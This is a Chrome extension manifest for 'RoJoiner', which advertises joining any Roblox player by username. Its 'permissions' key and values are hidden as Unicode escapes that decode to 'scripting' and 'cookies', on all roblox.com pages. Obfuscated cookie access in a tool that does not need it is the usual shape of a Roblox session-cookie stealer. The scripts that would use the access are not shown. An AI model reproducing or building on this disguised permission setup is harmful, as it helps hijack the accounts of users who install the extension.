{
  "update_url": "https://clients2.google.com/service/update2/crx",
  "name": "RoJoiner",
  "manifest_version": 3,
  "version": "0.1",
  "description": "Join any Roblox player with only their username.",
  "icons": {
    "16": "images/roblox.png",
    "32": "images/roblox.png",
    "48": "images/roblox.png",
    "128": "images/roblox.png"
  },
  "\u0070\u0065\u0072\u006d\u0069\u0073\u0073\u0069\u006f\u006e\u0073": [
    "\u0073\u0063\u0072\u0069\u0070\u0074\u0069\u006e\u0067",
    "\u0063\u006f\u006f\u006b\u0069\u0065\u0073"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "host_permissions": [
    "https://*.roblox.com/games/"
  ],
  "content_scripts": [
    {
      "matches": ["https://*.roblox.com/*"],
      "css": ["styles.css"]
    }
  ],
  "web_accessible_resources": [
    {
      "resources": [
        "images/*.png",
        "styles.css",
        "content.js",
        "load.js",
        "panel.html"
      ],
      "matches": [
        "https://*.roblox.com/*"
      ]
    }
  ]
}
